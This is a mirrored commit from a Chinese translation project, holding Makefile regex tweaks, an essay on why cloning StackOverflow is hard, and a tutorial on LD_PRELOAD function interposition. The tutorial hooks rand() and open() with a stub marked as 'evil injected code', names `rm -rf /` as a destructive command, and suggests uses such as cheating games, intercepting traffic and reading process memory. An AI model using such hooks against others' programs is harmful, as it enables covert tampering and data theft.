mirror of
https://github.com/LCTT/TranslateProject.git
synced 2025-01-25 23:11:02 +08:00
完成翻译
This commit is contained in:
commit
13cd5752f6
16
Makefile
16
Makefile
@ -18,28 +18,28 @@ $(CHANGE_FILE):
|
||||
git --no-pager diff $(TRAVIS_BRANCH) FETCH_HEAD --no-renames --name-status > $@
|
||||
|
||||
rule-source-added:
|
||||
[ $(shell grep '^A\s\+sources/[a-zA-Z0-9_-/ ]*\.md' $(CHANGE_FILE) | wc -l) -ge 1 ]
|
||||
[ $(shell grep -v '^A\s\+sources/[a-zA-Z0-9_-/ ]*\.md' $(CHANGE_FILE) | wc -l) = 0 ]
|
||||
[ $(shell grep '^A\s*sources/[^\/]*/[a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) -ge 1 ]
|
||||
[ $(shell grep -v '^A\s*sources/[^\/]*/[a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 0 ]
|
||||
echo 'Rule Matched: $(@)'
|
||||
|
||||
rule-translation-requested:
|
||||
[ $(shell grep '^M\s\+sources/[a-zA-Z0-9_-/ ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ]
|
||||
[ $(shell grep '^M\s*sources/[^\/]*/[a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 1 ]
|
||||
[ $(shell cat $(CHANGE_FILE) | wc -l) = 1 ]
|
||||
echo 'Rule Matched: $(@)'
|
||||
|
||||
rule-translation-completed:
|
||||
[ $(shell grep '^D\s\+sources/[a-zA-Z0-9_-/ ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ]
|
||||
[ $(shell grep '^A\s\+translated/[a-zA-Z0-9_-/ ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ]
|
||||
[ $(shell grep '^D\s*sources/[^\/]*/[a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 1 ]
|
||||
[ $(shell grep '^A\s*translated/[^\/]*/[a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 1 ]
|
||||
[ $(shell cat $(CHANGE_FILE) | wc -l) = 2 ]
|
||||
echo 'Rule Matched: $(@)'
|
||||
|
||||
rule-translation-revised:
|
||||
[ $(shell grep '^M\s\+translated/[a-zA-Z0-9_-/ ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ]
|
||||
[ $(shell grep '^M\s*translated/[^\/]*/[a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 1 ]
|
||||
[ $(shell cat $(CHANGE_FILE) | wc -l) = 1 ]
|
||||
echo 'Rule Matched: $(@)'
|
||||
|
||||
rule-translation-published:
|
||||
[ $(shell grep '^D\s\+translated/[a-zA-Z0-9_-/ ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ]
|
||||
[ $(shell grep '^A\s\+published/[a-zA-Z0-9_-/ ]*\.md' $(CHANGE_FILE) | wc -l) = 1 ]
|
||||
[ $(shell grep '^D\s*translated/[^\/]*/[a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 1 ]
|
||||
[ $(shell grep '^A\s*published/[a-zA-Z0-9_.,\(\) \-]*\.md' $(CHANGE_FILE) | wc -l) = 1 ]
|
||||
[ $(shell cat $(CHANGE_FILE) | wc -l) = 2 ]
|
||||
echo 'Rule Matched: $(@)'
|
||||
|
@ -0,0 +1,87 @@
|
||||
# [因为这个我要点名批评 Hacker News ][14]
|
||||
|
||||
|
||||
> “实现高速缓存会花费 30 个小时,你有额外的 30 个小时吗?
|
||||
不,你没有。我实际上并不知道它会花多少时间,可能它会花五分钟,你有五分钟吗?不,你还是没有。为什么?因为我在撒谎。它会消耗远超五分钟的时间。这一切把问题简单化的假设都只不过是程序员单方面的乐观主义。”
|
||||
>
|
||||
> — 出自 [Owen Astrachan][1] 教授于 2004 年 2 月 23 日在 [CPS 108][2] 上的讲座
|
||||
|
||||
[指责开源软件总是离奇难用已经不是一个新论点了][5];这样的论点之前就被很多比我更为雄辩的人提及过,甚至是出自一些人非常推崇开源软件的人士口中。那么为什么我要在这里老调重弹呢?
|
||||
|
||||
在周一的 Hacker News 期刊上,一段文章把我逗乐了。文章谈到,一些人认为 [编写代码实现和一个跟 StackOverflow 一样的系统可以简单到爆][6],并自信的 [声称他们可以在 7 月 4 号的周末就写出一版和 StackOverflow 原版一模一样的程序][7],以此来证明这一切是多么容易。另一些人则插话说,[现有的][8][那些仿制产品][9] 就已经是一个很好的例证了。
|
||||
|
||||
秉承着自由讨论的精神,我们来假设一个场景。你在思考了一阵之后认为你可以用 ASP.NET MVC 来编写一套你自己的 StackOverflow 。我呢,在被一块儿摇晃着的怀表催眠之后,脑袋又挨了别人一顿棒槌,然后像个二哈一样一页一页的把 StackOverflow 的源码递给你,让你照原样重新拿键盘逐字逐句的在你的环境下把那些代码再敲一遍,做成你的 StackOverflow。假设你可以像我一样打字飞快,一分钟能敲 100 个词 ([也就是大约每秒敲八个字母][10]),但是却可以牛叉到我无法企及的打字零错误率。从 StackOverflow 的大小共计 2.3MB 的源码来估计(包括 .CS、 .SQL、 .CSS、 .JS 和 .aspx 文件),就单单是照着源代码这么飞速敲一遍而且一气呵成中间一个字母都不错,你也要差不多用掉至少 80 个小时的时间。
|
||||
|
||||
或者你打算从零开始编码实现你自己的 StackOverflow,虽然我知道你肯定是不会那样做的。我们假设你从设计程序,到敲代码,再到最终完成调试只需要区区十倍于抄袭 StackOverflow 源代码的时间。即使在这样的假设条件下,你也要耗费几周的时间昼夜不停得狂写代码。不知道你是否愿意,但是至少我可以欣然承认,如果只给我照抄 StackOverflow 源代码用时的十倍时间来让我自己写 StackOverflow,我可是打死也做不到。
|
||||
|
||||
_好的_,我知道你在听到这些假设的时候已经开始觉得泄气了。*你在想,如果不是全部实现,而只是实现 StackOverflow __大部分__ 的功能呢?这总归会容易很多了吧。*
|
||||
|
||||
好的,问题是什么是 “大部分” 功能?如果只去实现提问和回答问题的功能?这个部分应该很简单吧。其实不然,因为实现问和答的功能还要求你必须做出一个对问题及其答案的投票系统,来显示大家对某个答案是赞同还是反对。因为只有这样你才能保证提问者可以得到这个问题的唯一的可信答案。当然,你还不能让人们赞同或者反对他们自己给出的答案,所以你还要去实现这种禁止自投自票的机制。除此之外,你需要去确保用户在一定的时间内不能赞同或反对其他用户太多次,以此来防止有人用机器人程序作弊乱投票。你很可能还需要去实现一个垃圾评论过滤器,即使这个过滤器很基础很简陋,你也要考虑如何去设计它。而且你恐怕还需要去支持用户图标(头像)的功能。并且你将不得不寻找一个自己真正信任的并且与 Markdown 结合很好的干净的 HTML 库(当然,假设你确实想要复用 StackOverflow 的 [那个超棒的编辑器][11] )。你还需要为所有控件购买或者设计一些小图标、小部件,此外你至少需要实现一个基本的管理界面,以便那些喜欢捣鼓的用户可以调整和改动他们的个性化设置。并且你需要实现类似于 Karma 的声望累积系统,以便用户可以随着不断地使用来稳步提升他们的话语权和解锁更多的功能以及可操作性。
|
||||
|
||||
但是如果你实现了以上_所有_功能,可以说你_就已经_把要做的都做完了。
|
||||
|
||||
除非……除非你还要做全文检索功能。尤其是在“边问边搜”(动态检索)的特性中,支持全文检索是必不可少的。此外,录入和显示用户的基本信息,实现对问题答案的评论功能,以及实现一个显示热点提问的页面,以及热点问题和帖子随着时间推移沉下去的这些功能,都将是不可或缺的。另外你肯定还需要去实现回答奖励系统,并支持每个用户用多个不同的 OpenID 账户去登录,然后将这些相关的登录事件通过邮件发送出去来通知用户,并添加一个标签或徽章系统,接着允许管理员通过一个不错的图形界面来配置这些标签和<ruby>徽章<rt>Badge</rt></ruby>。你需要去显示用户的 Karma 历史,以及他们的历史点赞和差评。而且整个页面还需要很流畅的展开和拉伸,因为这个系统的页面随时都可能被 Slashdot、Reddit 或是 StackOverflow 这些动作影响到。
|
||||
|
||||
在这之后!你会以为你基本已经大功告成了!
|
||||
|
||||
……为了产品的完整性,在上面所述的工作都完成之后,你又奋不顾身的去实现了升级功能,界面语言的国际化,Karma 值上限,以及让网站更专业的 CSS 设计、AJAX,还有那些看起来理所当然做起来却让人吐血的功能和特性。如果你不是真的动手来尝试做一个和 StackOverflow 一模一样的系统,你肯定不会意识到在整个程序设计实施的过程中,你会踩到无数的鬼才会知道的大坑。
|
||||
|
||||
那么请你告诉我:如果你要做一个让人满意的类似产品出来,上述的哪一个功能是你可以省略掉的呢?哪些是“大部分”网站都具备的功能,哪些又不是呢?
|
||||
|
||||
正因为这些很容易被忽视的问题,开发者才会以为做一个 StackOverflow 的仿制版产品会很简单。也同样是因为这些被忽视了的因素,开源软件才一直让人用起来很痛苦。很多软件开发人员在看到 StackOverflow 的时候,他们并不能察觉到 StackOverflow 产品的全貌。他们会简单的把 Stackoverflow 的实现抽象成下面一段逻辑和代码:
|
||||
|
||||
```
|
||||
create table QUESTION (ID identity primary key,
|
||||
TITLE varchar(255), --- 为什么我知道你认为是 255
|
||||
BODY text,
|
||||
UPVOTES integer not null default 0,
|
||||
DOWNVOTES integer not null default 0,
|
||||
USER integer references USER(ID));
|
||||
create table RESPONSE (ID identity primary key,
|
||||
BODY text,
|
||||
UPVOTES integer not null default 0,
|
||||
DOWNVOTES integer not null default 0,
|
||||
QUESTION integer references QUESTION(ID))
|
||||
```
|
||||
|
||||
如果你让这些开发者去实现 StackOverflow,进入他脑海中的就是上面的两个 SQL 表和一个用以呈现表格数据的 HTML 文件。他们甚至会忽略数据的格式问题,进而单纯的以为他们可以在一个周末的时间里就把 StackOverflow 做出来。一些稍微老练的开发者可能会意识到他们还要去实现登录和注销功能、评论功能、投票系统,但是仍然会自信的认为这不过也就是利用一个周末就能完成了;因为这些功能也不过意味着在后端多了几张 SQL 表和 HTML 文件。如果借助于 Django 之类的构架和工具,他们甚至可以直接拿来主义地不花一分钱就实现用户登录和评论的功能。
|
||||
|
||||
但这种简单的实现却_远远不能_体现出 StackOverflow 的精髓。无论你对 StackOverflow 的感觉如何,大多数使用者似乎都同意 StackOverflow 的用户体验从头到尾都很流畅。使用 StackOverflow 的过程就是在跟一个精心打磨过的产品在愉快地交互。即使我没有深入了解过 StackOverflow ,我也能猜测出这个产品的成功和它的数据库的 Schema 没有多大关系 —— 实际上在有幸研读过 StackOverflow 的源码之后,我得以印证了自己的想法,StackOverflow 的成功确实和它的数据库设计关系甚小。真正让它成为一个极其易用的网站的原因,是它背后_大量的_精雕细琢的设计和实施。多数的开发人员在谈及仿制和克隆一款产品的难度时,真的_很少会去考虑到产品背后的打磨和雕琢工作_,因为他们认为_这些打磨和雕琢都是偶然的,甚至是无足轻重的。_
|
||||
|
||||
这就是为什么用开源工具去克隆和山寨 StackOverflow 其实是很容易失败的。即使这些开源开发者只是想去实现 StackOverflow 的主要的“规范和标准特性”,而非全面的高级特性,他们也会在实现的过程中遭遇种种关键和核心的问题,让他们阴沟翻船,半途而废。拿徽章功能来说,如果你要针对普通终端用户来设计徽章, 则要么需要实现一个用户可用来个性化设置徽章的 GUI,要么则取巧的设计出一个比较通用的徽章,供所有的安装版本来使用。而开源设计的实际情况是,开发者会有很多的抱怨和牢骚,认为给徽章这种东西设计一个功能全面的 GUI 是根本不可能的。而且他们会固执地把任何标准徽章的提案踢回去,踢出第一宇宙速度,击穿地壳甩到地球的另一端。最终这些开发者还是会搞出一个类似于 Roundup 的 bug tracker 程序都在使用的流程和方案:即实现一个通用的机制,提供以 Python 或 PHP 为基础的一些系统 API, 以便那些可以自如使用 Python 或 PHP 的人可以轻松的通过这些编程接口来定制化他们自己的徽章。而且老实说,PHP 和 Python 可是比任何可能的 GUI 接口都要好用和强大得多,为什么还要考虑 GUI 的方案呢?(出自开源开发者的想法)
|
||||
|
||||
同样的,开源开发者会认为那些系统设置和管理员界面也一样可以省略掉。在他们看来,假如你是一个管理员,有 SQL 服务器的权限,那么你就理所当然的具备那些系统管理员该有的知识和技能。那么你其实可以使用 Djang-admin 或者任何类似的工具来轻松的对 StackOverflow 做很多设置和改造工作。毕竟如果你是一个 mods (懂如何 mod 的人)那么你肯定知道网站是怎么工作的,懂得如何利用专业工具去设置和改造一个网站。对啊!这不就得了! 毋庸置疑,在开源开发者重做他们自己的 StackOverflow 的时候,他们也不会把任何 StackOverflow 在接口上面的失败设计纠正过来。即使是原版 StackOverflow 里面最愚蠢最失败的那个设计(即要求用户必须拥有一个 OpenID 并知道如何使用它)在某个将来最终被 StackOverflow 删除和修正掉了, 我相信正在复制 StackOverflow 模式的那些开源克隆产品也还是会不假思索的把这个 OpenID 的功能仿制出来。这就好比是 GNOME 和 KDE 多年以来一直在做的事情,他们并没有把精力放在如何在设计之初就避免 Windows 的那些显而易见的毛病和问题,相反的却是在亦步亦趋的重复着 Windows 的设计,想办法用开源的方式做出一个比拟 Windows 功能的系统。
|
||||
|
||||
开发者可能不会关心一个应用的上述设计细节,但是终端用户一定会。尤其是当他们在尝试去选择要使用哪个应用的时候,这些终端用户更会重视这些接口设计是否易用。就好像一家好的软件公司希望通过确保其产品在出货之前就有一流的质量,以降低售后维护支持的成本一样,懂行的消费者也会在他们购买这些产品之前就确保产品好用,以防在使用的时候不知所措,然后无奈的打电话给售后来解决问题。开源产品就失败在这里,而且相当之失败。一般来讲,付费软件则在这方面做得好很多。
|
||||
|
||||
这不是说开源软件没有自己的立足之地,这个博客就运行在 Apache、[Django][12]、[PostgreSQL][13] 和 Linux 搭建的开源系统之上。但是让我来告诉你吧,配置这些堆栈可不是谁都可以做的。老版本的 PostgreSQL 需要手工配置 Vacuuming 来确保数据库的自动清理,而即使是最新版本的 Ubuntu 和 FreeBSD 也仍然要求用户去手工配置他们的第一个数据库集群。
|
||||
|
||||
相比之下,MS SQL (微软的 SQL 数据库) 则不需要你手工配置以上的任何一样东西。至于 Apache …… 我的天,Apache 简直复杂到让我根本来不及去尝试给一个新用户讲解我们如何可以通过一个一次性的安装过程就能把虚拟机、MovableType,几个 Django apps 和 WordPress 配置在一起并流畅地使用。单单是给那些技术背景还不错但并非软件开发者的用户解释清楚 Apache 的那些针对多进程和多线程的设置参数就已经够我喝一壶的了。相比之下,微软的 IIS 7 或者是使用了 OS X 服务器的那个几乎闭源的 GUI 管理器的 Apache ,在配置的时候就要简单上不止一个数量级了。Django 确实是一个好的开源产品,但它也 _只是_ 一个基础构架,而并非是一个可以直接面向终端普通用户的商业产品。而开源真正的强项就 _恰恰在_ 这种基础构架的开发和创新上,这也正是驱使开发者为开源做贡献的最本真的动力。
|
||||
|
||||
所以我的结论是,如果下次你再看到一个你喜欢的应用程序,请好好细心地揣摩一下这款产品,揣摩一下所有的那些针对用户的体贴入微的设计细节。而不是武断的认为你可以轻轻松松的在一周之内就用开源工具做一个和这个应用一模一样的产品出来。那些认为制作和实现一个应用程序如此简单的人,十之八九都是因为忽略了软件开发的最终产品是要交给用户去用的。
|
||||
|
||||
-------------------------------------------------------------------------------
|
||||
|
||||
via: https://bitquabit.com/post/one-which-i-call-out-hacker-news/
|
||||
|
||||
作者:[Benjamin Pollack][a]
|
||||
译者:[hopefully2333](https://github.com/hopefully2333),[yunfengHe](https://github.com/yunfengHe)
|
||||
校对:[yunfengHe](https://github.com/yunfengHe),[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://bitquabit.com/meta/about/
|
||||
[1]:http://www.cs.duke.edu/~ola/
|
||||
[2]:http://www.cs.duke.edu/courses/cps108/spring04/
|
||||
[3]:https://bitquabit.com/categories/programming
|
||||
[4]:https://bitquabit.com/categories/technology
|
||||
[5]:http://blog.bitquabit.com/2009/06/30/one-which-i-say-open-source-software-sucks/
|
||||
[6]:http://news.ycombinator.com/item?id=678501
|
||||
[7]:http://news.ycombinator.com/item?id=678704
|
||||
[8]:http://code.google.com/p/cnprog/
|
||||
[9]:http://code.google.com/p/soclone/
|
||||
[10]:http://en.wikipedia.org/wiki/Words_per_minute
|
||||
[11]:http://github.com/derobins/wmd/tree/master
|
||||
[12]:http://www.djangoproject.com/
|
||||
[13]:http://www.postgresql.org/
|
||||
[14]:https://bitquabit.com/post/one-which-i-call-out-hacker-news/
|
@ -0,0 +1,206 @@
|
||||
动态连接的诀窍:使用 LD_PRELOAD 去欺骗、注入特性和研究程序
|
||||
=============
|
||||
|
||||
**本文假设你具备基本的 C 技能**
|
||||
|
||||
Linux 完全在你的控制之中。虽然从每个人的角度来看似乎并不总是这样,但是高级用户喜欢去控制它。我将向你展示一个基本的诀窍,在很大程度上你可以去影响大多数程序的行为,它并不仅是好玩,在有时候也很有用。
|
||||
|
||||
### 一个让我们产生兴趣的示例
|
||||
|
||||
让我们以一个简单的示例开始。先乐趣,后科学。
|
||||
|
||||
|
||||
*random_num.c:*
|
||||
|
||||
```
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <time.h>
|
||||
|
||||
int main(){
|
||||
srand(time(NULL));
|
||||
int i = 10;
|
||||
while(i--) printf("%d\n",rand()%100);
|
||||
return 0;
|
||||
}
|
||||
```
|
||||
|
||||
我相信,它足够简单吧。我不使用任何参数来编译它,如下所示:
|
||||
|
||||
```
|
||||
gcc random_num.c -o random_num
|
||||
```
|
||||
|
||||
我希望它输出的结果是明确的:从 0-99 中选择的十个随机数字,希望每次你运行这个程序时它的输出都不相同。
|
||||
|
||||
现在,让我们假装真的不知道这个可执行程序的出处。甚至将它的源文件删除,或者把它移动到别的地方 —— 我们已不再需要它了。我们将对这个程序的行为进行重大的修改,而你并不需要接触到它的源代码,也不需要重新编译它。
|
||||
|
||||
因此,让我们来创建另外一个简单的 C 文件:
|
||||
|
||||
*unrandom.c:*
|
||||
|
||||
```
|
||||
int rand(){
|
||||
return 42; //the most random number in the universe
|
||||
}
|
||||
```
|
||||
|
||||
我们将编译它进入一个共享库中。
|
||||
|
||||
```
|
||||
gcc -shared -fPIC unrandom.c -o unrandom.so
|
||||
```
|
||||
|
||||
因此,现在我们已经有了一个可以输出一些随机数的应用程序,和一个定制的库,它使用一个常数值 `42` 实现了一个 `rand()` 函数。现在 …… 就像运行 `random_num` 一样,然后再观察结果:
|
||||
|
||||
```
|
||||
LD_PRELOAD=$PWD/unrandom.so ./random_num
|
||||
```
|
||||
|
||||
如果你想偷懒或者不想亲自动手(或者不知什么原因猜不出发生了什么),我来告诉你 —— 它输出了十次常数 42。
|
||||
|
||||
如果先这样执行
|
||||
|
||||
```
|
||||
export LD_PRELOAD=$PWD/unrandom.so
|
||||
```
|
||||
|
||||
然后再以正常方式运行这个程序,这个结果也许会更让你吃惊:一个未被改变过的应用程序在一个正常的运行方式中,看上去受到了我们做的一个极小的库的影响 ……
|
||||
|
||||
**等等,什么?刚刚发生了什么?**
|
||||
|
||||
是的,你说对了,我们的程序生成随机数失败了,因为它并没有使用 “真正的” `rand()`,而是使用了我们提供的那个 —— 它每次都返回 `42`。
|
||||
|
||||
**但是,我们*告诉过*它去使用真实的那个。我们编程让它去使用真实的那个。另外,在创建那个程序的时候,假冒的 `rand()` 甚至并不存在!**
|
||||
|
||||
这句话并不完全正确。我们只能告诉它去使用 `rand()`,但是我们不能去选择哪个 `rand()` 是我们希望我们的程序去使用的。
|
||||
|
||||
当我们的程序启动后,(为程序提供所需要的函数的)某些库被加载。我们可以使用 `ldd` 去学习它是怎么工作的:
|
||||
|
||||
```
|
||||
$ ldd random_num
|
||||
linux-vdso.so.1 => (0x00007fff4bdfe000)
|
||||
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f48c03ec000)
|
||||
/lib64/ld-linux-x86-64.so.2 (0x00007f48c07e3000)
|
||||
```
|
||||
|
||||
正如你看到的输出那样,它列出了被程序 `random_num` 所需要的库的列表。这个列表是构建进可执行程序中的,并且它是在编译时决定的。在你的机器上的具体的输出可能与示例有所不同,但是,一个 `libc.so` 肯定是有的 —— 这个文件提供了核心的 C 函数。它包含了 “真正的” `rand()`。
|
||||
|
||||
我使用下列的命令可以得到一个全部的函数列表,我们看一看 libc 提供了哪些函数:
|
||||
|
||||
```
|
||||
nm -D /lib/libc.so.6
|
||||
```
|
||||
|
||||
这个 `nm` 命令列出了在一个二进制文件中找到的符号。`-D` 标志告诉它去查找动态符号,因为 `libc.so.6` 是一个动态库。这个输出是很长的,但它确实在列出的很多标准函数中包括了 `rand()`。
|
||||
|
||||
现在,在我们设置了环境变量 `LD_PRELOAD` 后发生了什么?这个变量 **为一个程序强制加载一些库**。在我们的案例中,它为 `random_num` 加载了 `unrandom.so`,尽管程序本身并没有这样去要求它。下列的命令可以看得出来:
|
||||
|
||||
```
|
||||
$ LD_PRELOAD=$PWD/unrandom.so ldd random_num
|
||||
linux-vdso.so.1 => (0x00007fff369dc000)
|
||||
/some/path/to/unrandom.so (0x00007f262b439000)
|
||||
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f262b044000)
|
||||
/lib64/ld-linux-x86-64.so.2 (0x00007f262b63d000)
|
||||
```
|
||||
|
||||
注意,它列出了我们当前的库。实际上这就是代码为什么得以运行的原因:`random_num` 调用了 `rand()`,但是,如果 `unrandom.so` 被加载,它调用的是我们所提供的实现了 `rand()` 的库。很清楚吧,不是吗?
|
||||
|
||||
### 更清楚地了解
|
||||
|
||||
这还不够。我可以用相似的方式注入一些代码到一个应用程序中,并且用这种方式它能够像个正常的函数一样工作。如果我们使用一个简单的 `return 0` 去实现 `open()` 你就明白了。我们看到这个应用程序就像发生了故障一样。显而易见,解决的办法是真实地去调用原始的 `open()`:
|
||||
|
||||
*inspect_open.c:*
|
||||
|
||||
```
|
||||
int open(const char *pathname, int flags){
|
||||
/* Some evil injected code goes here. */
|
||||
return open(pathname,flags); // Here we call the "real" open function, that is provided to us by libc.so
|
||||
}
|
||||
```
|
||||
|
||||
嗯,不对。这将不会去调用 “原始的” `open(...)`。显然,这是一个无休止的递归调用。
|
||||
|
||||
怎么去访问这个 “真正的” `open()` 函数呢?它需要去使用程序接口进行动态链接。它比听起来更简单。我们来看一个完整的示例,然后,我将详细解释到底发生了什么:
|
||||
|
||||
*inspect_open.c:*
|
||||
|
||||
```
|
||||
#define _GNU_SOURCE
|
||||
#include <dlfcn.h>
|
||||
|
||||
typedef int (*orig_open_f_type)(const char *pathname, int flags);
|
||||
|
||||
int open(const char *pathname, int flags, ...)
|
||||
{
|
||||
/* Some evil injected code goes here. */
|
||||
|
||||
orig_open_f_type orig_open;
|
||||
orig_open = (orig_open_f_type)dlsym(RTLD_NEXT,"open");
|
||||
return orig_open(pathname,flags);
|
||||
}
|
||||
```
|
||||
|
||||
`dlfcn.h` 是我们后面用到的 `dlsym` 函数所需要的。那个奇怪的 `#define` 是命令编译器去允许一些非标准的东西,我们需要它来启用 `dlfcn.h` 中的 `RTLD_NEXT`。那个 `typedef` 只是创建了一个函数指针类型的别名,它的参数等同于原始的 `open` —— 它现在的别名是 `orig_open_f_type`,我们将在后面用到它。
|
||||
|
||||
我们定制的 `open(...)` 的主体是由一些代码构成。它的最后部分创建了一个新的函数指针 `orig_open`,它指向原始的 `open(...)` 函数。为了得到那个函数的地址,我们请求 `dlsym` 在动态库堆栈上为我们查找下一个 `open()` 函数。最后,我们调用了那个函数(传递了与我们的假冒 `open()` 一样的参数),并且返回它的返回值。
|
||||
|
||||
我使用下面的内容作为我的 “邪恶的注入代码”:
|
||||
|
||||
*inspect_open.c (片段):*
|
||||
|
||||
```
|
||||
printf("The victim used open(...) to access '%s'!!!\n",pathname); //remember to include stdio.h!
|
||||
```
|
||||
|
||||
要编译它,我需要稍微调整一下编译参数:
|
||||
|
||||
```
|
||||
gcc -shared -fPIC inspect_open.c -o inspect_open.so -ldl
|
||||
```
|
||||
|
||||
我增加了 `-ldl`,因此,它将这个共享库链接到 `libdl` —— 它提供了 `dlsym` 函数。(不,我还没有创建一个假冒版的 `dlsym` ,虽然这样更有趣)
|
||||
|
||||
因此,结果是什么呢?一个实现了 `open(...)` 函数的共享库,除了它有 _输出_ 文件路径的意外作用以外,其它的表现和真正的 `open(...)` 函数 **一模一样**。:-)
|
||||
|
||||
如果这个强大的诀窍还没有说服你,是时候去尝试下面的这个示例了:
|
||||
|
||||
```
|
||||
LD_PRELOAD=$PWD/inspect_open.so gnome-calculator
|
||||
```
|
||||
|
||||
我鼓励你去看看自己实验的结果,但是简单来说,它实时列出了这个应用程序可以访问到的每个文件。
|
||||
|
||||
我相信它并不难想像为什么这可以用于去调试或者研究未知的应用程序。请注意,这个特定诀窍并不完整,因为 `open()` 并不是唯一一个打开文件的函数 …… 例如,在标准库中也有一个 `open64()`,并且为了完整地研究,你也需要为它去创建一个假冒的。
|
||||
|
||||
### 可能的用法
|
||||
|
||||
如果你一直跟着我享受上面的过程,让我推荐一个使用这个诀窍能做什么的一大堆创意。记住,你可以在不损害原始应用程序的同时做任何你想做的事情!
|
||||
|
||||
1. ~~获得 root 权限~~。你想多了!你不会通过这种方法绕过安全机制的。(一个专业的解释是:如果 ruid != euid,库不会通过这种方法预加载的。)
|
||||
2. 欺骗游戏:**取消随机化**。这是我演示的第一个示例。对于一个完整的工作案例,你将需要去实现一个定制的 `random()` 、`rand_r()`、`random_r()`,也有一些应用程序是从 `/dev/urandom` 之类的读取,你可以通过使用一个修改过的文件路径来运行原始的 `open()` 来把它们重定向到 `/dev/null`。而且,一些应用程序可能有它们自己的随机数生成算法,这种情况下你似乎是没有办法的(除非,按下面的第 10 点去操作)。但是对于一个新手来说,它看起来很容易上手。
|
||||
3. 欺骗游戏:**让子弹飞一会** 。实现所有的与时间有关的标准函数,让假冒的时间变慢两倍,或者十倍。如果你为时间测量和与时间相关的 `sleep` 或其它函数正确地计算了新的值,那么受影响的应用程序将认为时间变慢了(你想的话,也可以变快),并且,你可以体验可怕的 “子弹时间” 的动作。或者 **甚至更进一步**,你的共享库也可以成为一个 DBus 客户端,因此你可以使用它进行实时的通讯。绑定一些快捷方式到定制的命令,并且在你的假冒的时间函数上使用一些额外的计算,让你可以有能力按你的意愿去启用和禁用慢进或快进任何时间。
|
||||
4. 研究应用程序:**列出访问的文件**。它是我演示的第二个示例,但是这也可以进一步去深化,通过记录和监视所有应用程序的文件 I/O。
|
||||
5. 研究应用程序:**监视因特网访问**。你可以使用 Wireshark 或者类似软件达到这一目的,但是,使用这个诀窍你可以真实地控制基于 web 的应用程序发送了什么,不仅是看看,而是也能影响到交换的数据。这里有很多的可能性,从检测间谍软件到欺骗多用户游戏,或者分析和逆向工程使用闭源协议的应用程序。
|
||||
6. 研究应用程序:**检查 GTK 结构** 。为什么只局限于标准库?让我们在所有的 GTK 调用中注入一些代码,因此我们就可以知道一个应用程序使用了哪些组件,并且,知道它们的构成。然后这可以渲染出一个图像或者甚至是一个 gtkbuilder 文件!如果你想去学习一些应用程序是怎么管理其界面的,这个方法超级有用!
|
||||
7. **在沙盒中运行不安全的应用程序**。如果你不信任一些应用程序,并且你可能担心它会做一些如 `rm -rf /` 或者一些其它不希望的文件活动,你可以通过修改传递到文件相关的函数(不仅是 `open` ,也包括删除目录等)的参数,来重定向所有的文件 I/O 操作到诸如 `/tmp` 这样地方。还有更难的诀窍,如 chroot,但是它也给你提供更多的控制。它可以更安全地完全 “封装”,但除非你真的知道你在做什么,不要以这种方式真的运行任何恶意软件。
|
||||
8. **实现特性** 。[zlibc][1] 是明确以这种方法运行的一个真实的库;它可以在访问文件时解压文件,因此,任何应用程序都可以在无需实现解压功能的情况下访问压缩数据。
|
||||
9. **修复 bug**。另一个现实中的示例是:不久前(我不确定现在是否仍然如此)Skype(它是闭源的软件)从某些网络摄像头中捕获视频有问题。因为 Skype 并不是自由软件,源文件不能被修改,这就可以通过使用预加载一个解决了这个问题的库的方式来修复这个 bug。
|
||||
10. 手工方式 **访问应用程序拥有的内存**。请注意,你可以通过这种方式去访问所有应用程序的数据。如果你有类似的软件,如 CheatEngine/scanmem/GameConqueror 这可能并不会让人惊讶,但是,它们都要求 root 权限才能工作,而 `LD_PRELOAD` 则不需要。事实上,通过一些巧妙的诀窍,你注入的代码可以访问所有的应用程序内存,从本质上看,是因为它是通过应用程序自身得以运行的。你可以修改这个应用程序能修改的任何东西。你可以想像一下,它允许你做许多的底层的侵入…… ,但是,关于这个主题,我将在某个时候写一篇关于它的文章。
|
||||
|
||||
这里仅是一些我想到的创意。我希望你能找到更多,如果你做到了 —— 通过下面的评论区共享出来吧!
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://rafalcieslak.wordpress.com/2013/04/02/dynamic-linker-tricks-using-ld_preload-to-cheat-inject-features-and-investigate-programs/
|
||||
|
||||
作者:[Rafał Cieślak][a]
|
||||
译者:[qhwdw](https://github.com/qhwdw)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://rafalcieslak.wordpress.com/
|
||||
[1]:http://www.zlibc.linux.lu/index.html
|
||||
|
||||
|
@ -1,86 +1,80 @@
|
||||
Linux 用户的逻辑卷管理指南
|
||||
逻辑卷管理(LVM) Linux 用户指南
|
||||
============================================================
|
||||
|
||||
![Logical Volume Management (LVM)](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/rh_003499_01_other11x_cc.png?itok=I_kCDYj0 "Logical Volume Management (LVM)")
|
||||
|
||||
Image by : opensource.com
|
||||
|
||||
